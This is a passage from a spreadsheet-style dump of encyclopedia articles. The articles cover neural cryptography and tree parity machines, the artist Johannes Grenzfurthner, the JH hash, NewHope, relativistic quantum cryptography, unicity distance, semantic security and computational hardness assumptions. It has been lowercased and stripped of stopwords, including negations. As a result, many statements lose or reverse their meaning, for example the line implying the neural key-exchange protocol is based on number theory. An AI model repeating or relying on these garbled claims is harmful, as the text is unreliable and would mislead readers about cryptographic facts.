    <t>neural cryptography branch cryptography dedicated analyzing application stochastic algorithms, especially artificial neural network algorithms, encryption cryptanalysis. definition artificial neural networks well known ability selectively explore solution space given problem. this feature finds natural niche application field cryptanalysis. time, neural networks offer approach attack ciphering algorithms based principle function could reproduced neural network, powerful proven computational tool used find inverse-function cryptographic algorithm. ideas mutual learning, self learning, stochastic behavior neural networks similar algorithms used different aspects cryptography, like public-key cryptography, solving distribution problem using neural network mutual synchronization, hashing generation pseudo-random numbers. another idea ability neural network separate space non-linear pieces using "bias". gives different probabilities activating neural network not. this useful case cryptanalysis. names used design domain research: neuro-cryptography neural cryptography. first work known topic traced back 1995 master thesis. applications 1995, sebastien dourlens applied neural networks cryptanalyze allowing networks learn invert s-tables des. bias studied differential cryptanalysis shamir highlighted. experiment shows bits found, allowing complete found short time. hardware application multi micro-controllers proposed easy implementation multilayer neural networks hardware. example public-key protocol given khalil shihab. describes decryption scheme public creation based backpropagation neural network. encryption scheme private creation process based boolean algebra. this technique advantage small time memory complexities. disadvantage property backpropagation algorithms: huge training sets, learning phase neural network long. therefore, protocol theoretical far. neural exchange protocol used protocol exchange parties practice diffie–hellman exchange protocol. neural exchange, based synchronization tree parity machines, secure replacement method. synchronizing machines similar synchronizing chaotic oscillators chaos communications. tree parity machine tree parity machine special type multi-layer feedforward neural network. consists output neuron, hidden neurons input neurons. inputs network take three values: {\displaystyle x_{ij}\in \left\{-1,0,+1\right\}} weights input hidden neurons take values: {\displaystyle w_{ij}\in \left\{-l,...,0,...,+l\right\}} output value hidden neuron calculated multiplications input neurons weights: {\displaystyle \sigma _{i}=\operatorname {sgn}(\sum _{j=1}^{n}w_{ij}x_{ij})} signum simple function, returns −1,0 {\displaystyle \operatorname {sgn}(x)={\begin{cases}-1&amp;{\text{if }}x&lt;0,\\0&amp;{\text{if }}x=0,\\1&amp;{\text{if }}x&gt;0.\end{cases}}} scalar product output hidden neuron mapped order ensure binary output value. output neural network computed multiplication values produced hidden elements: {\displaystyle \tau =\prod _{i=1}^{k}\sigma _{i}} output tree parity machine binary. protocol each party uses tree parity machine. synchronization tree parity machines achieved steps initialize random weight values execute steps full synchronization achieved generate random input vector compute values hidden neurons compute value output neuron compare values tree parity machines outputs same: suitable learning rules applied weights outputs different: 2.1after full synchronization achieved (the weights tree parity machines same), weights keys. this method known bidirectional learning. following learning rules used synchronization: hebbian learning rule: {\displaystyle w_{i}^{+}=g(w_{i}+\sigma _{i}x_{i}\theta (\sigma _{i}\tau )\theta (\tau ^{a}\tau ^{b}))} anti-hebbian learning rule: {\displaystyle w_{i}^{+}=g(w_{i}-\sigma _{i}x_{i}\theta (\sigma _{i}\tau )\theta (\tau ^{a}\tau ^{b}))} random walk: {\displaystyle w_{i}^{+}=g(w_{i}+x_{i}\theta (\sigma _{i}\tau )\theta (\tau ^{a}\tau ^{b}))} where: {\displaystyle \theta (a,b)=0} {\displaystyle a\neq otherwise {\displaystyle \theta (a,b)=1} and: {\displaystyle g(x)} function keeps {\displaystyle w_{i}} range {\displaystyle \{-l,-l+1,...,0,...,l-1,l\}} attacks security protocol every attack considered, attacker eavesdrop messages parties opportunity change them. brute force provide brute force attack, attacker test possible keys (all possible values weights wij). hidden neurons, input neurons boundary weights gives (2l+1)kn possibilities. example, configuration gives 3*10253 possibilities, making attack impossible today's computer power. learning tree parity machine basic attacks provided attacker, owns tree parity machine parties wants synchronize tree parity machine parties. step three situations possible: output(a) output(b): none parties updates weights. output(a) output(b) output(e): three parties update weights tree parity machines. output(a) output(b) output(e): parties update tree parity machines, attacker that. because situation learning slower synchronization parties b.it proven, synchronization parties faster learning attacker. improved increasing synaptic depth neural network. that gives protocol enough security attacker find small probability. other attacks conventional cryptographic systems, improve security protocol increasing length. case neural cryptography, improve increasing synaptic depth neural networks. changing parameter increases cost successful attack exponentially, effort users grows polynomially. therefore, breaking security neural exchange belongs complexity class alexander klimov, anton mityaguine, shamir original neural synchronization scheme broken least three different attacks—geometric, probabilistic analysis, using genetic algorithms. even though particular implementation insecure, ideas behind chaotic synchronization could potentially lead secure implementation. permutation parity machine permutation parity machine binary variant tree parity machine.it consists input layer, hidden layer output layer. number neurons output layer depends number hidden units each hidden neuron binary input neurons: {\displaystyle x_{ij}\in \left\{0,1\right\}} weights input hidden neurons also binary: {\displaystyle w_{ij}\in \left\{0,1\right\}} output value hidden neuron calculated exclusive disjunctions (exclusive input neurons weights: {\displaystyle \sigma _{i}=\theta _{n}(\sum _{j=1}^{n}w_{ij}\oplus x_{ij})} means xor). function {\displaystyle \theta _{n}(x)} threshold function, returns {\displaystyle \theta _{n}(x)={\begin{cases}0&amp;{\text{if }}x\leq n/2,\\1&amp;{\text{if }}x&gt;n/2.\end{cases}}} output neural network hidden neurons computed exclusive values produced hidden elements: {\displaystyle \tau =\bigoplus _{i=1}^{k}\sigma _{i}} other configurations output layer also possible.this machine proven robust enough attacks could used cryptographic mean, shown vulnerable probabilistic attack. security quantum computers quantum computer device uses quantum mechanisms computation. device data stored qubits (quantum binary digits). that gives quantum computer comparison conventional computer opportunity solve complicated problems short time, e.g. discrete logarithm problem factorization. algorithms based number theory problems searched property. neural exchange protocol based number theory. based difference unidirectional bidirectional synchronization neural networks. therefore, something like neural exchange protocol could give rise potentially faster exchange schemes. also neural network stochastic neural network shor's algorithm references neuro-cryptography 1995 first definition neuro-cryptography neural-cryptography) applied cryptanalysis sebastien dourlens, france. neural cryptography description kind neural cryptography university würzburg, germany. kinzel, kanter, (2002). "neural cryptography". proceedings international conference neural information processing. iconip '02. 1351–1354. arxiv:cond-mat/0208453. doi:10.1109/iconip.2002.1202841. leading papers introduce concept using synchronized neural networks achieve public authentication system. li-hua; lin, luon-chang; hwang, min-shiang (november 2001). remote password authentication scheme multiserver architecture using neural networks". ieee transactions neural networks. (6): 1498–1504. doi:10.1109/72.963786. issn 1045-9227. pmid 18249979. possible practical application neural cryptography. klimov, alexander; mityagin, anton; shamir, (2002). "analysis neural cryptography" (pdf). advances cryptology. asiacrypt 2002. lncs. vol. 2501. 288–298. doi:10.1007/3-540-36178-2_18. issn 0302-9743. retrieved 2017-11-15. analysis neural cryptography general focusing weakness possible attacks using synchronized neural networks. neural synchronization cryptography andreas ruttor. thesis, bayerische julius-maximilians-universität würzburg, 2006. ruttor, andreas; kinzel, wolfgang; naeh, rivka; kanter, (march 2006). "genetic attack neural cryptography". physical review (3): 036121. arxiv:cond-mat/0512022. bibcode:2006phrve..73c6121r. doi:10.1103/physreve.73.036121. issn 1539-3755. pmid 16605612. s2cid 27786815. khalil shihab (2006). backpropagation neural network computer network security" (pdf). journal computer science 710–715. archived original (pdf) 2007-07-12.</t>
  </si>
  <si>
    <t>Johannes Grenzfurthner</t>
  </si>
  <si>
    <t>johannes grenzfurthner (german: [joˈhanəs ˈgrɛntsfʊɐ̯tnɐ]; born 1975 vienna) austrian artist, filmmaker, writer, actor, curator, theatre director, performer lecturer. grenzfurthner founder, conceiver artistic director monochrom, international theory group. most artworks labelled monochrom. grenzfurthner outspoken researcher subversive underground culture, example field sexuality technology, founders "techno-hedonism".since 2020 editor-in-chief print online magazine free lunch.boing boing magazine referred grenzfurthner leitnerd, wordplay german term leitkultur ironically hints grenzfurthner's role nerd/hacker/art culture. career early 1990s, grenzfurthner member several message boards. grenzfurther used online connections create monochrom, zine alternative magazine dealt art, technology subversive cultures. motivation react emerging conservativism cyber-cultures early 1990s, combine political background austrian punk antifa movement discussion technologies cultures create. publication featured interviews essays, e.g. bruce sterling, giger, eric drexler, terry pratchett black, experimental layout style. 1995 group decided cover artistic practices started experimenting different media: computer games, robots, puppet theater, musical, short films, pranks, conferences, online activism, grenzfurthner calls 'urban hacking' specific: 'context hacking', term grenzfurthner coined. context hacking transfers hackers' objectives methods network social relationships artistic production occurs, upon dependent. metaphoric sense, relationships also source code. programs them, interaction structured user interface. when know space, niche, scene, subculture media political practice functions, change "recode" deconstructing power relationships emancipating compulsions packaging guidelines.the group known working different media, entertainment formats. grenzfurthner calls "looking best weapon mass distribution idea". conferences festivals grenzfurthner head arse elektronika festival francisco (2007 annual academic artistic conference anthology series focusses sexuality technology. first conference curated grenzfurthner 2007 answer questions impact sexuality technological innovation adoption. grenzfurthner hosting roboexotica, international festival cocktail-robotics (2002–) invites researchers artists build machines serve cocktails. vale calls roboexotica ironic attempt criticize techno-triumphalism dissect technological hypes."grenzfurthner head hedonistika, festival artistic food tech. first installment presented montréal 2014 'biennale internationale d'art numérique'. second installment presented holon, near aviv, 'print screen festival'. theatre work, performance grenzfurthner wrote directed theatre plays pieces performance (e.g. eignblunzn) interventionist art. film grenzfurther film production company monochrom propulsion systems. member austrian director's guild association austrian documentary filmmakers.he wrote directed shorts feature films. first feature film independent fantasy-comedy gstettensaga: rise echsenfriedl (2014). grenzfurther first feature documentary traceroute (2016), followed glossary broken dreams (2018). horror feature masking threshold premiered fantastic fest september 2021 released drafthouse films.grenzfurther developing several feature films, like political comedy sierra zulu. horror film razzennest released autumn 2022, documentary feature hacking leaves 2023. grenzfurthner juliana neuhuber co-directing upcoming sci-fi feature comedy suis auto (featuring chase masterson). academia, academic writing, lecturing grenzfurthner lectures institutions, symposions political events, teaches universities mentors students.he published books, essays articles politics, contemporary art, communication processes philosophy including mind matter: comparative approaches towards complexity, androids sleep electric sheep?, intercourse intracourse: sexuality, biomodification techno-social sphere pr0nnovation?: pornography technological innovation.grenzfurthner published much debated pamphlet "hacking spaces", dealt exclusionist tendencies hackerspaces movement. grenzfurther extended critique lectures 2012 2014 hackers planet earth conferences york city. entertainment acting grenzfurthner taken comedic turn performed various venues, e.g. vienna's rabenhof theater. parts comedy show "schicksalsjahre eines nerds" form basis documentary film traceroute (2016). grenzfurther presenter emcee various industry events, guest performer events like goldenes brett. grenzfurthner supporting lead parts several theater plays. performs andi haller's feature film zero crash michael epstein's sophia cacciola's feature film clickbait umbilicus desidero. portrays lead characters film suis auto. grenzfurthner voice acted director fritz lang karina longworth's vanity fair podcast love crime (together zooey deschanel hamm). community work grenzfurthner core team members development process netznetz, kind community-based funding system culture together culture department city government vienna.he started "hackbus" community.together florian hufsky, findeisen juxi leitner, grenzfurthner co-organized first international conference pirate parties. commercial work grenzfurthner conceptualized co-built robot installation promote products company dragon. created artistic online campaign cheetos. personal life grenzfurthner lives works vienna. grenzfurther grew stockerau rural lower austria talks stand-up comedy "schicksalsjahre eines nerds" (2014) semi-autobiographical documentary film traceroute (2016). grown stockerau, boonies lower austria, would now. germ cell burgeoning nerdism difference. yearning understood, find opportunities share experiences, left alone one's bizarre interest. time derives almost perverse pleasure wallowing deficit. nerds love deficiency: other, also own. nerds eager explorers, enjoy measuring another also compete aggressively. nerd's existence also comprises element occult, mystery. power expressed focused important.grenzfurthner uses personal history upbringing source work. conversation zebrabutter names example wanted deal claustrophobia, started series performances volunteers buried alive. child, grenzfurthner spent time grandparents' farm small village unterzögersdorf cadastral municipality stockerau). grandparents' stories nazism, world soviet occupation allied-occupied austria (1945–1955) influenced monochrom's long-term project soviet unterzoegersdorf. controversy grenzfurthner's name activists, politicians, artists germany, switzerland austria (only total austrian names) published ultra-right doxing list distributed variety online platforms december 2018 january 2019. list's extremist creators threatened "#wirkriegeneuchallee" (sic!) all". grenzfurthner openly addressed online platforms lectures. artistic fake image posted grenzfurthner july 2021 twitter account sparked controversy social media news.jean peters reports book "wenn hoffnung stirbt, geht's trotzdem weiter" (2021, translation german) special form anti-fascist prank grenzfurthner staged: austrian artist johannes grenzfurthner, also published context hacking, mingled disguise nazi demonstration bavaria spring 2005. when cameras passed made forbidden hitler salute. when started quickly broke; everyone around joined created media images showing group really was. turned bizarre approached said, "stop, stop!" which, coming nazi, sounded like performative peculiarity, "we're allowed here." whether over-affirmation mimicry, point make truly visible would rather remain hidden behind facade self-righteousness. awards director "udo 77") nestroy theatre prize (2005). coke light edition award (2006). artistic director monochrom) award austrian science fund (2013). filmography (features) hacking leaves released 2023) director, writer, producer, actor suis auto released 2023) director, writer, producer, actor razzennest released 2022) director, writer, producer masking threshold (2021) director, writer, producer, actor transformations transformations drs. jenkins (2021) segment director, actor avenues (2019) producer zweite rechts (2019) producer, actor glossary broken dreams (2018) director, writer, producer, actor clickbait (2018) actor traceroute (2016) director, writer, producer, host shingal, you? (2016) associate producer valossn (2016) associate producer zero crash (2016) actor gstettensaga: rise echsenfriedl (2014) director, writer, producer kiki bubu: rated (2011) director, writer theater (examples) (rabenhof theater, vienna, 2004/2005) director, actor, writer waiting goto (volkstheater, vienna, 2006) director, writer campaign (volkstheater, vienna, 2006) director, performer, writer monochrom's (garage vienna ballhaus ost, berlin, 2011 2012) director, actor, writer schicksalsjahre eines nerds (rabenhof theater, vienna, 2014) director, performer, writer steppenrot (komm.st, styria theater spektakel, vienna, 2017) director, actor, writer hansi halleluja show (komm.st, styria theater spektakel, vienna, 2018–2019) director, actor, writer scharlachrote kraftfeld (komm.st, styria theater spektakel, vienna, 2019–2020) director, actor, writer music (examples) carefully selected moments (album, trost records, 2008) publications editor magazine/yearbook series "monochrom" (1993, 1994, 1995, 1996, 1997, 1998, 2000, 2004, 2006, 2007, 2010) editor "stadt klage" (michael marrak, 1997) editor "weg engel" (michael marrak agus chuadar, 1998) editor "who shot immanence?" (together thomas edlinger fritz ostermayer, 2002) editor "leutezeichnungen" (together elffriede, 2003) editor "quo vadis, logo?!" (together günther friesinger, 2006) editor "spektakel kunst gesellschaft" (together stephan grigat günther friesinger, 2006) editor "pr0nnotivation? arse elektronika anthology" (together günther friesinger daniel fabry, 2008) editor "roboexotica" (together günther friesinger, magnus wurzer, franz ablinger chris veigl, 2008) editor androids sleep electric sheep?" (together günther friesinger, daniel fabry thomas ballhausen, 2009) editor "schutzverletzungen/legitimation mediatic violence" (together günther friesinger thomas ballhausen, 2010) editor "urban hacking" (together günther friesinger thomas ballhausen, 2010) editor "geist maschine. medien, prozesse räume kybernetik" (together günther friesinger, thomas ballhausen, verena bauer, 2010) editor "the wonderful world absence" (together günther friesinger daniel fabry, 2011) editor intercourse intracourse sexuality, biomodification techno-social sphere" (together günther friesinger daniel fabry, 2011) editor "context hacking: mess art, media, market" (together günther friesinger frank apunkt schneider, 2013) editor "screw system explorations spaces, games politics sexuality technology" (together günther friesinger daniel fabry, 2013) editor subvert subversion. politischer widerstand kulturelle praxis (together günther friesinger, 2020) references external links johannes grenzfurthner imdb</t>
  </si>
  <si>
    <t>JH (hash function)</t>
  </si>
  <si>
    <t>cryptographic hash function submitted nist hash function competition hongjun though chosen five finalists competition, 2012 ultimately lost nist hash candidate keccak. 1024-bit state, works 512-bit input blocks. processing input block consists three steps: input block left half state. apply 42-round unkeyed permutation (encryption function) state. this consists repetitions break input 4-bit blocks, 4-bit s-boxes, choice made 256-bit round-dependent schedule. equivalently, combine input block bit, result s-box. adjacent 4-bit blocks using maximum distance separable code gf(24). permute 4-bit blocks adjacent different blocks following rounds. input block right half state.the resulting digest first 224, 256, bits 1024-bit final value. well suited slicing implementation using sse2 instruction set, giving speeds 16.8 cycles byte. examples hashes hash values empty string. jh-224("") 2c99df889b019309051c60fecc2bd285a774940e43175b76b2626630 jh-256("") 46e64619c18bb0a92a5e87185a47eef83ca747b8fcc8e1412921357e326df434 jh-384("") 2fe5f71b1b3290d3c017fb3c1a4d02a5cbeb03a0476481e25082434a881994b0ff99e078d2c16b105ad069b569315328 jh-512("") 90ecf2f76f9d2c8017d979ad5ab96b87d58fc8fc4b83060f3f900774faa2c8fabe69c5f4ff1ec2b61d6b316941cedee117fb04b1f4c5bc1b919ae841c50eec4f even small change message (with overwhelming probability) result mostly different hash, avalanche effect. example, adding period sentence: jh-256("the quick brown jumps lazy dog") 6a049fed5fc6874acfdc4a08b568a4f8cbac27de933496f031015b38961608a0 jh-256("the quick brown jumps lazy dog.") d001ae2315421c5d3272bac4f4aa524bddd207530d5d26bbf51794f0da18fafc references external links site page sha-3 vhdl source code developed cryptographic engineering research group (cerg) george mason university</t>
  </si>
  <si>
    <t>NewHope</t>
  </si>
  <si>
    <t>post-quantum cryptography, newhope key-agreement protocol erdem alkim, ducas, thomas pöppelmann, peter schwabe designed resist quantum computer attacks.newhope based mathematical problem ring learning errors (rlwe) believed difficult solve. newhope selected round-two contestant nist post-quantum cryptography standardization competition, used google's cecpq1 experiment quantum-secure algorithm, alongside classical x25519 algorithm. design choices designers newhope made several choices developing algorithm: binomial sampling: although sampling high-quality discrete gaussian distribution important post-quantum lattice-based compact signature scheme falcon (gpv-style hash-and-sign paradigm) bliss (glp-style fiat–shamir paradigm) prevent signature leaking information private key, otherwise essential exchange schemes. author chose sample error vectors binomial distribution. error reconciliation: what distinguishes newhope predecessors method error reconciliation. previous ring learning error exchange schemes correct errors coefficient time, whereas newhope corrects errors coefficients time based high-dimension geometry. this allows lower decryption failure rate higher security. base vector generation: authors newhope proposed deriving base "generator" vector (commonly denoted {\displaystyle output function shake-128 order prevent "back-doored" values used, happen traditional diffie–hellman logjam attack. security levels: early versions papers describing newhope, authors proposed using 1024-degree polynomial 128-bit "post-quantum" security level, 512-degree polynomial "toy" instance cryptanalysis challenge. version submitted nist, 512-degree version codified provide 128-bit "classical" security level. also cecpq2 cryptography quantum cryptography references external links reference implementation</t>
  </si>
  <si>
    <t>Relativistic quantum cryptography</t>
  </si>
  <si>
    <t>relativistic quantum cryptography sub-field quantum cryptography, addition exploiting principles quantum physics, no-superluminal signalling principle relativity theory stating information cannot travel faster light exploited too. technically speaking, relativistic quantum cryptography sub-field relativistic cryptography, cryptographic protocols exploit no-superluminal signalling principle, independently whether quantum properties used not. however, practice, term relativistic quantum cryptography used relativistic cryptography too. history 1997 1998, important tasks mistrustful cryptography shown impossible achieve unconditional security. mayers chau showed unconditionally secure quantum commitment impossible. showed oblivious transfer broad class secure computations also impossible achieve unconditional security quantum cryptography. moreover, chau showed unconditionally secure ideal quantum coin tossing impossible too. context, kent provided 1999 first relativistic cryptographic protocols, commitment ideal coin tossing, overcome assumptions made mayers, chau, achieve unconditional security. since then, unconditionally secure relativistic protocols commitment found kent others, cryptographic tasks investigated setting relativistic quantum cryptography. basics no-signalling no-superluminal signalling no-signalling principle quantum theory states information cannot communicated distinct locations without transmission physical systems, despite quantum entanglement shared this implies, particular, without transmission physical systems quantum correlation cannot used transmit information even non-locally causal violate bell inequalities. according relativity theory, physical systems cannot travel faster speed light. thus, follows no-signalling principle information cannot travel faster speed light. this called no-superluminal signalling principle. principle no-superluminal signalling physical principle exploited relativistic cryptography. guarantees outcome random variable obtained spacetime point cannot influence probability random variable takes value spacelike separated spacetime point thus, example, parties alice agents, first agent sending secret message first agent alice spacetime point second agent alice sending secret message second agent spacetime point spacelike separated, guaranteed message received alice chosen independently message gave alice, vice versa. this useful mathematical property exploited prove security cryptographic protocols relativistic cryptography. setting fundamental requirement relativistic cryptography parties implementing cryptographic task good description spacetime, least within region spacetime task implemented. example, protocols implemented near earth surface, assumed spacetime close minkowski. importantly, means that, near earth surface, physical systems information cannot travel faster speed light vacuum, approximately 300,000 km/s. principle, relativistic cryptography applied general spacetimes, long parties guarantee mechanisms allowing instant communication, like wormholes. another requirement parties access common reference frame, guarantee communication events spacelike separated.in relativistic cryptography, assumed party participating cryptographic task various trusted agents collaborate implement task. agents implement protocol performing different actions various points spacetime. agents party communicate authenticated secure channels, implemented previously shared secure keys, example using one-time pads.various tasks investigated relativistic cryptography consist tasks mistrustful cryptography, mistrustful parties must collaborate implement cryptographic task time guaranteed parties cheat. examples tasks mistrustful cryptography commitment, coin tossing, oblivious transfer secure computations. distribution belong mistrustful cryptography, case parties distributing trust other. relativistic cryptography, participating party various trusted agents, collaborate performing different actions various spacetime points. example, alice companies offices laboratories various locations earth. alice's offices laboratories work collaboration trust other. similarly, bob's offices laboratories work collaboration trust other. alice trust other. tasks investigated relativistic cryptography commitment commitment important cryptographic task widely investigated relativistic cryptography. commitment, alice commits time later time alice unveils committed bob. commitment said "hiding" cannot know alice unveils. said "binding" commitment time alice cannot choose value successfully unveil bob. commitment protocol "secure" hiding binding. mayers-lo-chau theorem states unconditionally secure commitment impossible based laws quantum physics. shown kent mayers-lo-chau theorem general enough excludes protocols exploit principle no-superluminal signalling. kent provided first unconditionally secure commitment protocol setting relativistic cryptography. various protocols commitment devised kent others. experimental demonstrations relativistic commitment implemented. coin tossing strong coin tossing, alice different locations wish toss coin alice guaranteed cannot bias outcome, guaranteed alice cannot bias outcome either. shown chau ideal strong coin tossing impossible achieve unconditional security based laws quantum physics. however, kent overcame no-go theorem providing relativistic protocol strong coin tossing unconditionally secure. this protocol conceptually simple illustrated example protocol relativistic cryptography. kent's coin tossing protocol, alice agents agents location {\displaystyle i\in \{0,1\}} distant separation assume spacetime minkowski. thus, minimum time light takes travel d/c, speed light vacuum. generates random {\displaystyle secure laboratory gives time generates random secure laboratory gives time communicate {\displaystyle secure authenticated channel. similarly, communicate {\displaystyle secure authenticated channel. alice agree output toss bits {\displaystyle {\displaystyle d=a\oplus alice agree advance values common reference frame, thus, principle superluminal signalling, receiving {\displaystyle cannot send signal arrives gives therefore, alice guaranteed chosen independently {\displaystyle chosen her. since alice chooses {\displaystyle randomly, since independent {\displaystyle alice guaranteed {\displaystyle d=a\oplus random. with similar arguments, also guaranteed random. variations coin tossing investigated relativistic cryptography colbeck kent. oblivious transfer secure computations showed oblivious transfer secure computations cannot achieved unconditional security based laws quantum physics. this impossibility result extends general setting relativistic quantum cryptography. colbeck showed various secure computations impossible achieve unconditional security relativistic quantum cryptography. position-based quantum cryptography position-based quantum cryptography consists cryptographic tasks whose security exploit location party, principle no-superluminal signalling laws quantum physics. example, problem quantum location authentication, prover wants demonstrate location verifiers using quantum systems. protocol quantum location authentication works follows. verifiers various locations surround location send classical messages quantum states towards location prover location receive signals specific times reply verifiers requested classical messages and/or quantum states, must received verifiers specific times.quantum location authentication first investigated kent 2002, called ‘quantum tagging’, resulting filed patent kent 2007, publication academic literature 2010, paper position-based quantum cryptography published buhrman there no-go theorem quantum location authentication proved buhrman stating impossible verifiers authenticate location prover unconditional security. this quantum location authentication protocol, dishonest provers sharing sufficient amount entanglement positioned verifiers location intercept communications verifiers, including transmitted quantum states, apply non-local quantum operation allows reply correctly correct times verifiers. since dishonest provers need location this, quantum location authentication protocol insecure. this no-go theorem assumes location honest prover credential. kent showed prover shares secret keys verifiers location authentication implemented securely. references</t>
  </si>
  <si>
    <t>Unicity distance</t>
  </si>
  <si>
    <t>cryptography, unicity distance length original ciphertext needed break cipher reducing number possible spurious keys zero brute force attack. that trying every possible key, decipherment makes sense, i.e. expected amount ciphertext needed determine completely, assuming underlying message redundancy.claude shannon defined unicity distance 1949 paper "communication theory secrecy systems". consider attack ciphertext string "wnaiw" encrypted using vigenère cipher five letter key. conceivably, string could deciphered string—river water possibilities certain keys. this general rule cryptanalysis: additional information impossible decode message. course, even case, certain number five letter keys result english words. trying possible keys river water, sxoos khdop well. number "working" keys likely much smaller possible keys. problem knowing "working" keys right one; rest spurious. relation size possible plaintexts general, given particular assumptions size number possible messages, average ciphertext length average) generate readable message. example upper case english characters, assume plaintext form, possible letters position string. likewise assume five-character upper case keys, k=265 possible keys, majority "work". tremendous number possible messages, generated using even limited characters: 26l, length message. however, smaller readable plaintext rules language, perhaps them, likely much smaller moreover, one-to-one relationship number keys work, given possible keys, (m/n) "work". correct key, rest spurious. since gets arbitrarily small length message increases, eventually large enough make number spurious keys equal zero. roughly speaking, makes km/n=1. this unicity distance. relation entropy plaintext redundancy unicity distance equivalently defined minimum amount ciphertext required permit computationally unlimited adversary recover unique encryption key.the expected unicity distance shown {\displaystyle u=h(k)/d} unicity distance, h(k) entropy space (e.g. 2128 equiprobable keys, rather less memorized pass-phrase). defined plaintext redundancy bits character. alphabet characters carry bits information character 25). general number bits information character log2(n), number characters alphabet log2 binary logarithm. english character convey log2(26) bits information. however average amount actual information carried character meaningful english text bits character. plain text redundancy 3.2.basically bigger unicity distance better. time unlimited size, given unbounded entropy space, {\displaystyle u=\infty consistent one-time unbreakable. unicity distance substitution cipher simple substitution cipher, number possible keys 4.0329 1026 288.4, number ways alphabet permuted. assuming keys equally likely, h(k) log2(26!) 88.4 bits. english text 3.2, thus 88.4/3.2 given characters ciphertext theoretically possible work english plaintext hence key. practical application unicity distance useful theoretical measure, much security block cipher attacked adversary real-world (limited) resources. consider block cipher unicity distance three ciphertext blocks. although clearly enough information computationally unbounded adversary find right (simple exhaustive search), computationally infeasible practice. unicity distance increased reducing plaintext redundancy. deploy data compression techniques prior encryption, example removing redundant vowels retaining readability. this good idea anyway, reduces amount data encrypted. ciphertexts greater unicity distance assumed meaningful decryption. ciphertexts shorter unicity distance multiple plausible decryptions. unicity distance measure much ciphertext required cryptanalysis, much ciphertext required reasonable solution cryptanalysis. references external links bruce schneier: recognize plaintext (crypto-gram newsletter december 1998) unicity distance computed common ciphers</t>
  </si>
  <si>
    <t>Semantic security</t>
  </si>
  <si>
    <t>cryptography, semantically secure cryptosystem negligible information plaintext feasibly extracted ciphertext. specifically, probabilistic, polynomial-time algorithm (ppta) given ciphertext certain message {\displaystyle (taken distribution messages), message's length, cannot determine partial information message probability non-negligibly higher ppta's access message length (and ciphertext). this concept computational complexity analogue shannon's concept perfect secrecy. perfect secrecy means ciphertext reveals information plaintext, whereas semantic security implies information revealed cannot feasibly extracted.: 378–381 history notion semantic security first forward goldwasser micali 1982. however, definition initially proposed offered straightforward means prove security practical cryptosystems. goldwasser/micali subsequently demonstrated semantic security equivalent another definition security called ciphertext indistinguishability chosen-plaintext attack. this latter definition common original definition semantic security better facilitates proving security practical cryptosystems. symmetric-key cryptography case symmetric-key algorithm cryptosystems, adversary must able compute information plaintext ciphertext. this posited adversary, given plaintexts equal length respective ciphertexts, cannot determine ciphertext belongs plaintext. public-key cryptography asymmetric encryption algorithm cryptosystem semantically secure, must infeasible computationally bounded adversary derive significant information message (plaintext) given ciphertext corresponding public encryption key. semantic security considers case "passive" attacker, i.e., generates observes ciphertexts using public plaintexts choice. unlike security definitions, semantic security consider case chosen ciphertext attack (cca), attacker able request decryption chosen ciphertexts, many semantically secure encryption schemes demonstrably insecure chosen ciphertext attack. consequently, semantic security considered insufficient condition securing general-purpose encryption scheme. indistinguishability chosen plaintext attack (ind-cpa) commonly defined following experiment: random pair {\displaystyle (pk,sk)} generated running {\displaystyle gen(1^{n})} probabilistic polynomial time-bounded adversary given public {\displaystyle generate number ciphertexts (within polynomial bounds). adversary generates equal-length messages {\displaystyle m_{0}} {\displaystyle m_{1}} transmits challenge oracle along public key. challenge oracle selects messages flipping fair coin (selecting random {\displaystyle b\in \{0,1\}} encrypts message {\displaystyle m_{b}} public key, returns resulting challenging ciphertext {\displaystyle adversary.the underlying cryptosystem ind-cpa (and thus semantically secure chosen plaintext attack) adversary cannot determine messages chosen oracle, probability significantly greater {\displaystyle 1/2} (the success rate random guessing). variants definition define indistinguishability chosen ciphertext attack adaptive chosen ciphertext attack (ind-cca, ind-cca2). because adversary possesses public encryption game, semantically secure encryption scheme must definition probabilistic, possessing component randomness; case, adversary could simply compute deterministic encryption {\displaystyle m_{0}} {\displaystyle m_{1}} compare encryptions returned ciphertext {\displaystyle successfully guess oracle's choice. semantically secure encryption algorithms include goldwasser-micali, elgamal paillier. these schemes considered provably secure, semantic security reduced solving hard mathematical problem (e.g., decisional diffie-hellman quadratic residuosity problem). other, semantically insecure algorithms rsa, made semantically secure (under stronger assumptions) random encryption padding schemes optimal asymmetric encryption padding (oaep). references</t>
  </si>
  <si>
    <t>Computable isomorphism</t>
  </si>
  <si>
    <t>computability theory sets {\displaystyle a;b\subseteq \mathbb natural numbers computably isomorphic recursively isomorphic exists total bijective computable function {\displaystyle f\colon \mathbb \mathbb {\displaystyle f(a)=b} myhill isomorphism theorem, relation computable isomorphism coincides relation mutual one-one reducibility. numberings {\displaystyle {\displaystyle called computably isomorphic exists computable bijection {\displaystyle {\displaystyle =\mu \circ computably isomorphic numberings induce notion computability set. references rogers, hartley, (1987), theory recursive functions effective computability (2nd ed.), cambridge, press, isbn 0-262-68052-1, 0886890.</t>
  </si>
  <si>
    <t>Computational hardness assumption</t>
  </si>
  <si>
    <t>computational complexity theory, computational hardness assumption hypothesis particular problem cannot solved efficiently (where efficiently typically means polynomial time"). known prove (unconditional) hardness essentially useful problem. instead, computer scientists rely reductions formally relate hardness complicated problem computational hardness assumption problem better-understood. computational hardness assumptions particular importance cryptography. major goal cryptography create cryptographic primitives provable security. cases, cryptographic protocols found information theoretic security; one-time common example. however, information theoretic security cannot always achieved; cases, cryptographers fall back computational security. roughly speaking, means systems secure assuming adversaries computationally limited, adversaries practice. computational hardness assumptions also useful guiding algorithm designers: simple algorithm unlikely refute well-studied computational hardness assumption comparing hardness assumptions computer scientists different ways assessing hardness assumptions reliable. strength hardness assumptions assumption {\displaystyle stronger assumption {\displaystyle {\displaystyle implies {\displaystyle (and converse false known). words, even assumption {\displaystyle false, assumption {\displaystyle still true, cryptographic protocols based assumption {\displaystyle still safe use. thus devising cryptographic protocols, hopes able prove security using weakest possible assumptions. average-case worst-case assumptions average-case assumption says specific problem hard instances explicit distribution, whereas worst-case assumption says problem hard instances. given problem, average-case hardness implies worst-case hardness, average-case hardness assumption stronger worst-case hardness assumption problem. furthermore, even incomparable problems, assumption like exponential time hypothesis often considered preferable average-case assumption like planted clique conjecture. note, however, cryptographic applications, knowing problem hard instance (i.e. problem hard worst-case) useless provide generating hard instances. fortunately, many average-case assumptions used cryptography (including rsa, discrete log, lattice problems) based worst-case assumptions worst-case-to-average-case reductions. falsifiability desired characteristic computational hardness assumption falsifiability, i.e. assumption false, would possible prove particular, naor (2003) introduced formal notion cryptographic falsifiability. roughly, computational hardness assumption said falsifiable formulated terms challenge: interactive protocol adversary efficient verifier, efficient adversary convince 